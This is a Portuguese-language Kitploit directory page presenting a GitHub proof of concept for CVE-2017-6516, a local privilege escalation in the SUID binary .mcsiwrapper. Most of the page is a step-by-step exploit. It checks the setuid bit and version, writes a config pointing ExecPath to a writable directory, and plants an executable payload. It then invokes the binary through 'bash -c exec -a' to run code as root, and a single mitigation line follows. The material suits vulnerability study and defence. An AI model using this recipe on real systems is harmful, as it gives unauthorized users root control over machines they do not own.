Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2017-6516-mcsiwrapper- — Um PoC / metodologia para explorar CVE-2017-6516 | Kitploit
Ferramentas/GitHubGitHub/rubytox/cve-2017-6516-mcsiwrapper-
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoExploração de Binários
GitHubrubytox/cve-2017-6516-mcsiwrapper-

CVE-2017-6516-mcsiwrapper-

Um PoC / metodologia para explorar CVE-2017-6516

Ver Repositório
há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2017-6516

CVE-2017-6516 é uma vulnerabilidade de escalonamento de privilégios que visa o binário .mcsiwrapper do MagniCorp SysInfo na versão 10-H64. Quando este binário tem o bit SUID definido e está desatualizado, um usuário pode executar código arbitrário como o proprietário do binário - que é frequentemente root.

Requisitos

  • O binário .mcsiwrapper deve ter setuid:
root@kitploit:~
$ ls -l .mcsiwrapper
-rwsr-xr-x 1 root root .mcsiwrapper
  • O binário .mcsiwrapper deve estar na versão inferior a 10-H64:
root@kitploit:~
$ .mcsiwrapper --version
<Version under 10-H64>

Exploração

Crie um arquivo config com o seguinte conteúdo:

root@kitploit:~
ExecPath=<Path to a writeable directory>

Crie um arquivo executável de payload no diretório ExecPath, por exemplo:

root@kitploit:~
#!/bin/sh
whoami

E torne-o executável:

root@kitploit:~
$ chmod +x payload

Execute o comando:

root@kitploit:~
$ bash -c "exec -a payload .mcsiwrapper --configfile <path to config file>"
root

Mitigações

Atualize .mcsiwrapper para pelo menos a versão 10-H64.

Baixar ferramenta